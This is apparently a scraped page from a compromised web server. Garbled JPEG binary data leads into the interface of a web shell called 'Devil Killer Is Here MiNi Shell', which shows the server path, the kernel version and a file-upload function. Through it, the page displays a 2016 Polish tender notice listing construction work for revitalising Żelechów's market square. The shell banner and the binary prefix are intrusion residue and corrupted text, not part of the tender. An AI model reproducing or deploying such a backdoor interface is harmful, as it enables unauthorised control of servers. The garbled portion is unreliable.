JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160606/70307-N-2016.html

<p class="kh_header"><b>Żelechów: Rewitalizacja zabytkowego rynku w Żelechowie</b><br>
<b>Numer ogłoszenia: 70307 - 2016; data zamieszczenia: 06.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Żelechowie , ul. Piłsudskiego 47, 08-430 Żelechów, woj. mazowieckie, tel. 25 754 11 44, faks 25 754 11 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zelechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja zabytkowego rynku w Żelechowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym jest wykonanie rewitalizacji zabytkowego rynku w Żelechowie (dz. nr 2058/3 w Żelechowie).

Roboty polegają na wykonaniu:
I. PRACE POMIAROWE
1. Roboty pomiarowe przy powierzchniowych robotach ziemnych - koryta pod nawierzchnie placów postojowych - w ilości 1.2664 ha.
II. ROBOTY ROZBIÓRKOWE I DEMONTAŻOWE
2. Rozebranie nawierzchni z płyt drogowych betonowych o grubości 12 cm z wypełnieniem spoin
zaprawą cementową spod kiosku - w ilości 12.000 m2.
3. Mechaniczne rozebranie nawierzchni z brukowca o wysokości 16-20 cm - w ilości 12664.0 m2.
4. Ręczne rozebranie nawierzchni z kostki brukowej na podsypce piaskowej chodników - w ilości
1402.0 m2.
5. Rozebranie krawężników betonowych 15x30 cm na podsypce cementowo - piaskowej - w ilości
462.6 m.
6. Rozebranie ław z betonu pod krawężniki - w ilości 27.756 m3.
7. Załadowanie gruzu i kamienia koparko-ładowarką przy obsłudze na zmianę roboczą przez 3
samochody samowyładowcze - w ilości 1187.240 m3.
8. Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym na odległość 1 km - w ilości 1187.240 m3.
III. PRZYGOTOWANIE PODBUDOWY
9. Przemieszczenie podbudowy - mechaniczne profilowanie i zagęszczenie podłoża pod warstwy
konstrukcyjne nawierzchni w gruncie kat. I-IV - w ilości 12664.0 m2.
10. Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I-IV
głębokości 30 cm - w ilości 12664.0 m2.
11. Podbudowa z kruszywa naturalnego - warstwa dolna o grubości po zagęszczeniu 30 cm - w ilości 12664.0 m2.
12. Podbudowa betonowa B-10 bez dylatacji - grubość warstwy po zagęszczeniu 12 cm - w ilości
6969.83 m2.
13. Podbudowa pod chodniki, jezdnie brukowe i place z kostki B-10 z dylatacją - grubość warstwy po zagęszczeniu 12 cm - w ilości 5694.20 m2.
IV. NAWIERZCHNIE Z KOSTKI GRANITOWEJ SZARORUDEJ 9/9/6 I PŁYT
GRANITOWYCH SZARYCH PLOMIENIOWANYCH 50/50/6
14. Nawierzchnia z kostki kamiennej szarorudej o wysokości 9/9/6 cm na podsypce cementowo-piaskowej gr. 5 cm - w ilości 2580.55 m2.
15. Powierzchnie z płyt kamiennych szarych płomieniowanych 50x50 z nacięciem rowków gł. ok. 2mm podział jak na projekcie o grubości 6 cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową - w ilości 2374.55m2.
V. NAWIERZCHNIA Z KOSTKI GRANITOWEJ SZARORUDEJ 9X9X10 I PŁYT
GRANITOWYCH SZARYCH 50X50X10 NA JEZDNI (przejścia dla pieszych)
16. Nawierzchnia z kostki kamiennej szarorudej o wysokości 9/9/10 cm na podsypce cementowo -
piaskowej gr 5 cm (przejść dla pieszych w jezdni) - w ilości 186.0 m2
17. Nawierzchnia z płyt kamiennych granitowych szarych płomieniowanych o wymiarach 50x50x10 cm na podsypce cementowo - piaskowej (przejść dla pieszych w jezdni ) z podziałem jak na projekcie gł. 2 mm/ - w ilości 186.0 m2.

VI. NAWIERZCHNIA Z OTOCZAKÓW KOCIE ŁBY
18. Nawierzchnia z brukowca z kamienia narzutowego o wym. 16-20 cm (kamień z odzysku) - w ilości 7277.30 m2.
19. Obramowania parkingów z kostki kamiennej rudej o wysokości 9/9/10 cm na podsypce cementowo - piaskowej - w ilości 232.326 m2.
20. Spoinowanie placu miałem kamiennym - warstwa górna - grubość po zagęszczeniu 2 cm - w ilości 12664.0 m2.
VII. KRAWĘŻNIKI KAMIENNE
21. Ława pod krawężniki betonowa B15 z oporem - w ilości 31.692 m3
22. Krawężniki kamienne granitowe cięte szare 15x30 i oporniki 10x20 na podsypce cementowo-piaskowej - w ilości 528.20 m.
VIII. WIATA OGŁOSZENIOWA I PRZY STUDNI
23. Ręczne wykopy fundamentowe z transportem urobku samochodami skrzyniowymi na odległość do 1 km (kat. gr. IV) - w ilości 2.4 m.
24. Podkłady betonowe na podłożu gruntowym, beton podawany taczkami lub japonkami, zwykły B-10 - w ilości 0.2 m3.
25. Stopy fundamentowe prostokątne żelbetowe, o objętości do 0,5 m3 - transport betonu taczkami lub japonkami B-10 - w ilości 2.4 m3.
26. Ramy górne i płatwie, długość do 3 m - przekrój poprzeczny drewna do 180cm2 - w ilości 0.315 m3.
27. Krokwie zwykłe, długość do 4.5 m przekrój poprzeczny drewna do 180 cm2 - w ilości 0.658 m3.
28. Miecze i zastrzały przekrój poprzeczny drewna do 180 cm2 - w ilości 0.4 m3.
29. Słupy o długości do 2 m - przekrój poprzeczny drewna do 180 cm2 - w ilości 0.544 m3.
30. Kotwy do wiązarów - marki stalowe - w ilości 1 szt.
31. Deskowanie połaci dachowych z tarcicy nasyconej - podbicie deskami struganymi - w ilości
28.96 m2
32. Ołacenie połaci dachowych łatami 38x50 mm, o rozstawie 16-24 cm - w ilości 28.96 m2
33. Analogia kontrłaty - w ilości 28.96 m2
34. Analogia wiatroizolacja - w ilości 28.96 m2
35. Pokrycie dachów dachówką holenderką ceramiczna - w ilości 28.96 m2
36. Gabloty otwierane szklone szkłem bezpiecznym fabrycznie wykończone o powierzchni do 1.6 m2 - w ilości 6.4 m2.
37. Wstawienie ławek o szer. do 0,5 m w krawędziach elementów wiaty przy studni - w ilości 30 szt.
IX. TERENY ZIELENI
38. Ręczne przekopanie gleby na terenie płaskim w gruncie kat. IV nie zadarnionym - w ilości 4.0 m2.
39. Ręczne rozrzucenie torfu na terenie płaskim grubość warstwy 2 cm - w ilości 0.001 ha.
40. Ręczny wysiew nawozów mineralnych lub wapna nawozowego w terenie płaskim - w ilości
0.001ha.
41. Wykonanie trawników parkowych siewem na gruncie kat. III bez nawożenia - w ilości 0.001 ha
42. Sadzenie drzew i krzewów liściastych form piennych na terenie płaskim w gruncie kat. III bez
zaprawy dołów; średnica głębokość : 0.5 m - w ilości 4 szt.
43. Rozścielenie kory - w ilości 0.01 m3.
X. MAŁA ARCHITEKTURA
44. Ławki parkowe z prefabrykatów żeliwnych - w ilości 20 szt.
45. Ustawienie w gotowych otworach słupków blokujących - w ilości 459 szt.
46. Montaż koszy na śmieci - w ilości 27 szt.
47. Ustawienie w gotowych otworach stojaków do rowerów na 5 stanowisk - w ilości 4 szt.
48. Hydranty pożarowe podziemne o śr. 100 mm - w ilości 2 kpl.
49. Pompa do wody (abisynka) z obudową uszczelniane folią aluminiową o śr. 100 mm z nasuwką - w ilości 1 kpl.
50. Montaż masztów flagowych - w ilości 2 szt.
51. Montaż osłon żeliwnych drzew - w ilości 4 szt.
XI. REGULACJA ISTNIEJĄCYCH STUDZIENEK TELEKOMUNIKACYJNYCH I
KANALIZACYJNYCH
52. Regulacja pionowa studzienek dla studzienek telefonicznych - w ilości 17 szt.
53. Regulacja pionowa studzienek dla włazów kanałowych - w ilości 26 szt.
XII. BUDOWA FONTANNY MIEJSKIEJ
12.1 Roboty ziemne
54. Pomiary przy wykopach fundamentowych w terenie równinnym i nizinnym - w ilości 129.85 m3.
55. Wykopy oraz przekopy wykonywane koparkami podsiębiernymi 0.25 m3 na odkład w gruncie kat. III - w ilości 129.85 m3.
56. Ręczne zasypywanie wykopów ze skarpami w gruncie kat. I-III z przerzutem na odl. do 3 m
Zasypanie z ubiciem w warunkach utrudnionych (wykopy z rozporami) - w ilości 46.64m3.
57. Roboty ziemne wykon. koparkami podsiębiernymi o poj. łyżki 0.25 m3 w gr. kat. III z transport
urobku samochodami samowyładowczymi na odległość 3 km - w ilości 83.21m3.
58. Podkłady z ubitych materiałów sypkich na podłożu gruntowym i obsypanie fundamentów - w ilości 55.082 m3.
12.2 Roboty betonowe i izolacje
59. Podkłady betonowe na podłożu gruntowym - w ilości 4.399m3.
60. Izolacje przeciwwilgociowe i przeciwwodne z folii polietylenowej gr 0,5 mm szerokiej zbiorników, basenów itp. - w ilości 43.992 m2.
61. Dolna płyta i górna żelbetowe - ręczne układanie betonu B-25 - w ilości 4.95m3.
62. Ściany żelbetowe proste grubości 38 cm wysokości do 3 m - z zastosowaniem pompy do betonu B-25 - w ilości 45.18m2.
63. Przygotowanie i montaż zbrojenia elementów budynków i budowli - pręty żebrowane - w ilości
0.857 t.
64. Izolacje i uszczelnienia z dwuskładnikowej elastycznej zaprawy AQUAFIN 2K na powierzchniach pionowych narażonych na działanie wody bezciśnieniowej; grubość warstwy 2,00 mm - w ilości 72.60 m2.
65. Izolacje cieplne z płyt styroduru pionowe na lepiku bez siatki metal. - w ilości 72.60 m2.
66. Roboty uzupełniające przy wykonywaniu izolacji i uszczelnień - wklejenie kształtek ASO
Dichtmannschette-Wand - kształtka do uszczelnień przejść rurowych w ścianach - w ilości 9 szt.
67. Wypełnienie spoin poziomych elastyczną dwuskładnikową żywicą epoksydowo - poliuretanową ASODUR-EPFMo wym. 6x6 mm - w ilości 126 m.
12.3 Roboty kamieniarskie
68. Obmurowanie z kamienia twardego 9x9x9 cm cokołu fontanny - w ilości 2.624 m3.
69. Nakrywy - płyty płomieniowane granitowe grubości 6 cm i szerokości 50 cm; obsadzenie
elementów na powierzchniach okładanych kamieniem, krótszych niż 5 m; obsadzenie elementów
widocznych dwustronnie - w ilości 16.60 m.
70. Montaż listew siedzeń drewnianych 80x80 mm - w ilości 107.90 m.
71. Montaż włazu tele do komory fontanny - żelbetowy pref - w ilości 0.556 m2.
XIII. SANITARNE FONTANNY
13.1 Instalacje technologiczne
13.1.1 Przyłącza
72. Przyłącze wodociągowe z rur ciśnieniowych PE łączonych metodą zgrzewania czołowego -
rurociągi o śr. 40 mm - w ilości 5 m.
73. Przyłącze kanalizacyjne z rurociągu z polichlorku winylu (PCW) ciśnieniowego łączonego na
uszczelkę gumową o śr. zewn. 160 mm - w ilości 5 m.

13.1.2 Instalacja technologiczna
74. Montaż pompy obiegowej z filtrem wstępnym, poziomej wydajności 1,5m3/h i wysokości
podnoszenia 6,5m H2O - w ilości 1 kpl.
75. Montaż pompy stałego poziomu wody z filtrem wstępnym, poziomej, wydajności 1,5m3/h i
wysokości podnoszenia 6,5m H2O - w ilości 1 kpl.
76. Montaż pompy do dyszy fontannowej z filtrem wstępnym, poziomej wydajności 14m3/h i wysokości podnoszenia 8m H2O - w ilości 1 kpl.
77. Zbiornik z PP o poj. 2 m3 (1mx2mx1m) - w ilości 1 kpl.
78. Filtr piaskowy DN350mm H-780mm i prędkości filtracji 50m/h - w ilości 1 szt.
79. Zawory przelotowe i zwrotne instalacji wodociągowych z rur z tworzyw sztucznych o śr.
nominalnej 32 mm -zawór 6-cio drogowym automatycznym 11/2 - w ilości 1 szt.
80. Dostawa i montaż śluzy dozującej, masa tabletek 5kg - w ilości 1 szt.
81. Dostawa i montaż regulatora poziomu z czujnikiem poziomu i elektrozaworem - w ilości 1 szt.
82. Rurociągi z polichlorku winylu (PCW) ciśnieniowe łączone na uszczelkę gumową o śr. zewn.
110mm - w ilości 12 m.
83. Rurociągi z polichlorku winylu (PCW) ciśnieniowe łączone na uszczelkę gumową o śr. zewn. 90mm - w ilości 12,0 m.
84. Rurociągi z polichlorku winylu (PCW) ciśnieniowe łączone na uszczelkę gumową o śr. zewn. 50mm - w ilości 40,0 m.
85. Rurociągi z PVC kanalizacyjne o śr. 50 mm w gotowych wykopach, wewnątrz budynków o
połączeniach wciskowych - w ilości 7,0 m.
86. Rurociągi z PVC kanalizacyjne o śr. 40 mm w gotowych wykopach, wewnątrz budynków o
połączeniach wciskowych - w ilości 6,0 m.
87. Dodatkowe nakłady - montaż złączek specjalnych do dysz D321 - w ilości 2,0 szt.
88. Dodatkowe nakłady - montaż złączek specjalnych do dysz D50112 - w ilości 4,0 szt
89. Dodatkowe nakłady - redukcja DN110/90 - w ilości 4,0 szt.
90. Dodatkowe nakłady - redukcja DN90/50 - w ilości 2,0 szt.
91. Przejścia szczelne dla rurociągów - w ilości 10 kpl.
92. Przejście systemowe do puszki elektrycznej - gwint 1 1/4 - w ilości 5 kpl.
93. Dławik kablowy do puszki elektrycznej - w ilości 20 kpl.
94. Przelew 3 - w ilości 4 kpl.
95. Spust z niecki 2 wraz z korkiem - w ilości 1 kpl.
96. Dysza wylotowa 1 1/2 - w ilości 4 kpl.
97. Dezynfekcja rurociągów sieci wodociągowych o śr. nom. do 150 mm odc. 200m - w ilości 1 odc.
98. Próba szczelności instalacji wodociągowych w budynkach mieszkalnych (rurociąg o śr. do 150mm) - w ilości 77.00 m
XIV. ELEKTRYCZNE FONTANNY
14.1 Instalacja zasilająca
99. Kopanie rowów dla kabli w sposób ręczny w gruncie kat. III - w ilości 10.56 m3.
100. Ręczne rozebranie nawierzchni chodników z kostki brukowej o grubości 8 cm - w ilości 16.50 m2.
101. Nasypanie warstwy piasku na dnie rowu kablowego o szerokości do 0.4 m - w ilości 33 m.
102. Układanie kabli o masie do 0.5 kg/m w rowach kablowych ręcznie YKY 5x6mm - w ilości 47 m.
103. Zasypywanie rowów dla kabli wykonanych ręcznie w gruncie kat. III - w ilości 7.92m3.
104. Nawierzchnie z kostki brukowej betonowej grubości 8 cm na podsypce cementowo - piaskowej z wypełnieniem spoin piaskiem - (90% kostki z demontażu) - w ilości 16.50 m2.
105. Tablice rozdzielcze o masie do 10 kg - tablica w pomieszczeniu technicznym - w ilości 1 szt.
106. Osprzęt modułowy w rozdzielnicach, rozłącznik lub wyłącznik przeciwporażeniowy, 4-biegunowy - Ogranicznik przepięć DEHNguard 275 - w ilości 1 szt.
107. Osprzęt modułowy w rozdzielnicach, rozłącznik lub wyłącznik przeciwporażeniowy,
 3-biegunowy - R 303 z wkładkami gG 16A - w ilości 1 szt.
108. Osprzęt modułowy w rozdzielnicach, rozłącznik lub wyłącznik przeciwporażeniowy,
 3-biegunowy - FR 303 20A - w ilości 1 szt.
109. Osprzęt modułowy w rozdzielnicach, rozłącznik lub wyłącznik przeciwporażeniowy,
 2-biegunowy - P 302 25 30AC - w ilości 1 szt.
110. Osprzęt modułowy w rozdzielnicach, rozłącznik lub wyłącznik przeciwporażeniowy,
4-biegunowy - P 304 25 30AC - w ilości 1 szt.
111. Osprzęt modułowy w rozdzielnicach, wyłącznik nadprądowy, 1 biegunowy - S 301 B10 - w ilości 1 szt.
112. Osprzęt modułowy w rozdzielnicach, wyłącznik nadprądowy, 1 biegunowy - S 301 B6 - w ilości 2 szt.
113. Osprzęt modułowy w rozdzielnicach, wyłącznik nadprądowy, 1 biegunowy - S 301 B2 - w ilości 2 szt. 
114. Osprzęt modułowy w rozdzielnicach, rozłącznik lub wyłącznik przeciwporażeniowy,
2-biegunowy - S302 B 6A - w ilości 1 szt.
115. Osprzęt modułowy w rozdzielnicach, rozłącznik lub wyłącznik przeciwporażeniowy,
 3-biegunowy - wyłącznik silnikowy M300 6.3A - w ilości 1 szt.
116. Osprzęt modułowy w rozdzielnicach, rozłącznik lub wyłącznik przeciwporażeniowy, 3-biegunowy - wyłącznik silnikowy M300 1.6A - w ilości 2 szt.
117. Aparaty elektryczne o masie do 2.5 kg- transformator 230/24V - 250VA - w ilości 2 szt.
118. Zamontowanie układu automatyki dostawcy aparatury fontanny - w ilości 1 kpl.
119. Konstrukcje wsporcze mocowane przez spawanie o masie do 1 kg - 2 mocowania (do korytek i
drabinek) - w ilości 15 szt.
120. Korytka o szerokości do 100 mm przykręcane do gotowych otworów - w ilości 5 m.
121. Wykonanie łuku na korytku o szerokości 100 mm - w ilości 1,0 szt.
122. Przewody kabelkowe o łącznym przekroju żył do 7.5 mm2 wciągane do rur giętkich YDY
3x1,5mm2 / 750V - w ilości 25,0 m.
123. Przewody kabelkowe o łącznym przekroju żył do 12.5 mm2 układane w gotowych korytkach i na drabinkach bez mocowania YDY 5x2,5mm2 / 750V - w ilości 30,0 m.
124. Przewody kabelkowe o łącznym przekroju żył do 7.5 mm2 wciągane do rur giętkich YDY
2x2,5mm2 / 750V - w ilości 15,0 m.
125. Przewody kabelkowe o łącznym przekroju żył do 7.5 mm2 wciągane do rur giętkich YDY
3x2,5mm2 / 750V - w ilości 10,0 m.
126. Oprawy oświetleniowe przykręcane (zwykłe) - żarowa IP67 24V 60W kanałowa - w ilości 2 kpl.
127. Łącznik 10A, 250V 1-biegunowy IP 65 - w ilości 1,0 szt.
128. Gniazda instalacyjne wtyczkowe 24V 2-biegunowe, IP 44 o obciążalności do 10 A i przekroju
przewodów do 2.5 mm2 - w ilości 1,0 szt.
129. Gniazda instalacyjne wtyczkowe ze stykiem ochronnym 2-biegunowe, IP 44 o obciążalności do 10A i przekroju przewodów do 2.5 mm2 - w ilości 1,0 szt.
130. Przewody uziemiające i wyrównawcze w budynkach mocowane na wspornikach ściennych na
podłożu innym niż drewno - GSU Cu 25x4 - w ilości 1,0 m
131. Uziomy ze stali profilowanej miedziowane o długości 4.5 m (metoda wykonania udarowa) - grunt kat. III - w ilości 1,0 szt.
14.2 Pomiary instalacji elektrycznej
132. Pomiar rezystancji izolacji instalacji elektrycznych - obwód 3-fazowy, pierwszy pomiar - w ilości 1 pomiar.
133. Pomiar rezystancji izolacji instalacji elektrycznych - obwód 3-fazowy, każdy następny pomiar - w ilości 4 pomiar.
134. Pomiar rezystancji izolacji instalacji elektrycznych - obwód 1-fazowy, pierwszy pomiar - w ilości 1 pomiar.
135. Pomiar rezystancji izolacji instalacji elektrycznych - obwód 1-fazowy, każdy następny pomiar - w ilości 12 pomiar.
136. Sprawdzenie samoczynnego wyłączenia zasilania - pomiar rezystancji uziemienia - pierwszy
pomiar - w ilości 1 pomiar.
137. Sprawdzenie samoczynnego wyłączenia zasilania - pomiar rezystancji uziemienia - każdy następny - w ilości 6 pomiar.
138. Sprawdzenie samoczynnego wyłączenia zasilania - próby działania wyłącznika
różnicowoprądowego - pierwszy - w ilości 1 pomiar.
139. Sprawdzenie samoczynnego wyłączenia zasilania - próby działania wyłącznika
różnicowoprądowego - każdy następny pomiar - w ilości 2 pomiar.
140. Badanie i pomiar instalacji odgromowej: pierwszy pomiar - w ilości 1 pomiar.
141. Następny pomiar instalacji odgromowej - w ilości 1 pomiar.

14.3 Iluminacja fontanny
142. Przebijanie otworów w ścianach lub stropach, w betonie, długość przebicia do 40 cm,
Fi 40 mm - w ilości 2 otwory.
143. Uszczelnianie przepustu przed przenikaniem wody - w ilości 1 m.
144. Oprawy typ A - w ilości 8 kpl.
145. Oprawy typ B - w ilości 4 kpl.
146. Dostawa elementu zasilania i sterowania opraw Z1 - w ilości 2 szt.
147. Dostawa elementu zasilania i sterowania opraw Z2 - w ilości 1 szt.
148. Programowanie sekwencji sterowania opraw.

XV. Budowa kablowej linii oświetlenia stylowego
1. Budowa szafki sterowania oświetleniem w pomieszczeniu technicznym - w ilości 1 kpl.
2. Kopanie rowów dla kabli w sposób ręczny w gruncie kat. III - w ilości 115.52m3.
3. Nasypanie warstwy piasku na dnie rowu kablowego o szerokości do 0.4 m - w ilości 14.44m.
4. Zasypywanie rowów dla kabli wykonanych ręcznie w gruncie kat. III - w ilości 62.64m3.
5. Montaż i stawianie słupów oświetleniowych np typ LEDOWE 40 W h=4,44 m (Latarnia z 1 oprawami HIT 40W, z fundamentem, źródłami i tabliczką bezpiecznikową) - w ilości 8 szt.
6. Ułożenie rur osłonowych z PCW o śr. do 140 mm - rury DVK 75 m - w ilości 12 m.
7. Układanie kabli o masie do 3.0 kg/m w rurach - YAKXS 4x35mm - w ilości 12 m.
8. Układanie kabli o masie do 3.0 kg/m w rowach kablowych ręcznie - w ilości 422.00m.
9. Zarobienie na sucho końca kabla YAKXS 4 x 35 mm2 0,6/1 kV 4-żyłowego o przekroju żył do
50mm2 na napięcie do 1 kV o izolacji i powłoce z tworzyw sztucznych - w ilości 8 szt.
10. Układanie uziomów w rowach kablowych płaskownik FeZn 25x4 - w ilości 385.0m.
11. Podłączenie kabla w słupach - w ilości 128.00 szt. żył
12. Połączenie płaskownika do zacisków słupa ( + połączenia w ziemi) - w ilości 8 szt.
13. Zabezpieczenie prefabrykowanego fundamentu słupa oświetleniowego abizolem - w ilości 1.2 m2
14. Montaż tabliczek zaciskowo - bezpiecznikowych w słupach ( z wył. 2x S 301 B6) - w ilości 10 szt.
15. Wciąganie przewodu YDY4x2,5 mm 450/750V w rurze RVKL 18 słupy- w ilości 8 kpl. 
przew.
16. Badanie linii kablowej nN.- kabel 4-żyłowy - w ilości 12 odc.
17. Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, instalacja
odgromowa, pomiar pierwszy - w ilości 12 szt
18. Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, instalacja
odgromowa, pomiar każdy następny - w ilości 12 szt
19. Malowanie liter i cyfr na powierzchniach zewnętrznych słupów. Oznaczenie podłączonych do
poszczególnych faz opraz - w ilości 12 znak.

XVI. Budowa iluminacji Ratusza
20. Kopanie rowów dla kabli w sposób ręczny w gruncie kat. III - w ilości 36.48m3.
21. Nasypanie warstwy piasku na dnie rowu kablowego o szerokości do 0.4 m - w ilości 4.56m.
22. Zasypywanie rowów dla kabli wykonanych ręcznie w gruncie kat. III - w ilości 27.36m3.
23. Układanie kabli o masie do 0.5 kg/m w rowach kablowych ręcznie - w ilości 208 m.
24. Montaż opraw iluminacyjnych ledowych 5W w chodniku z kostki IP67 (z puszką montażową i
złączem IP68) - w ilości 40 szt.
25. Podłączenie przewodów kabelkowych o przekroju żyły do 6 mm2 pod zaciski lub bolce - YKY
3x6mm - w ilości 42 szt. żył
26. Badanie linii kablowej N.N.- kabel 3-żyłowy - w ilości 42 odc.
27. Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, instalacja
odgromowa, pomiar każdy następny - w ilości 42 szt
28. Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, instalacja
odgromowa, pomiar każdy następny - w ilości 42 szt
XVII. Dodatki
29. Koszty związane z obsługą geodezyjną, wszystkie koszty niezbędne do wykonania zadania
inwestycyjnego zgodnie z projektem budowlanym i wymogami inwestora - w ilości 1 kpl.
XVIII. Budowa odcinka sieci elektroenergetycznej kablowej nn 0,4 kV oświetlenia rynku
30. Demontaż przewodów nieizolowanych linii NN o przekroju do 95 mm2 z przeznaczeniem
na złom - 0.273 km.
